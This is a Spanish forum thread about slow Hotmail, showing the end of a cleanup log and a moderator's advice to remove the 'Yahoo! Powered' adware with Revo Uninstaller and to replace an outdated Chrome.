      Documents and Settings => 0 B
      Default User => 66164 B
      All Users => 0 B
      systemprofile => 231180 B
      LocalService => 66164 B
      NetworkService => 66164 B
      MiguelTC => 2488215664 B

      RecycleBin => 0 B
      EmptyTemp: => 3.1 GB temporary data Removed.

      ================================


      The system needed a reboot.

      ==== End of Fixlog 15:15:08 ====





      Hotmail sigue lento.

    10. #10
      Moderador Gral.
      Avatar de @Javier_HF
      Registrado
      jun 2006
      Ubicación
      Spain.
      Mensajes
      21.475

      Re: Hotmail me va lentísimo

      Y ahora haces lo siguiente, descarga e instala este programa >> Manual de Revo Uninstaller, lee y revisa bien su funcionamiento.

      Y úsalo para desinstalar este programa :

      Yahoo! Powered (HKLM\...\{1D43F583-4DC3-2403-FC43-54832CC38703}) (Version: - )
      Cuando Revo te pida, que selecciones el método de desinstalación, seleccionas "Avanzado".

      Si durante el proceso te solicita "Reiniciar" NO lo hagas, dile que NO y deja que Revo siga trabajando.

      Cuando termines todos los procesos de desinstalación ya Reinicias tú el ordenador.

      Compruebas y comentas, aunque es muy probable que siga el problema, ya que tienes una version de Chrome(que es tu navegador por defecto ) que esta obsoleta y YA NO se actualiza como pasa con tu version de windows.
      Quien no lo intenta no lo consigue | ;-)

      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.

    Página 1 de 2 12 ÚltimoÚltimo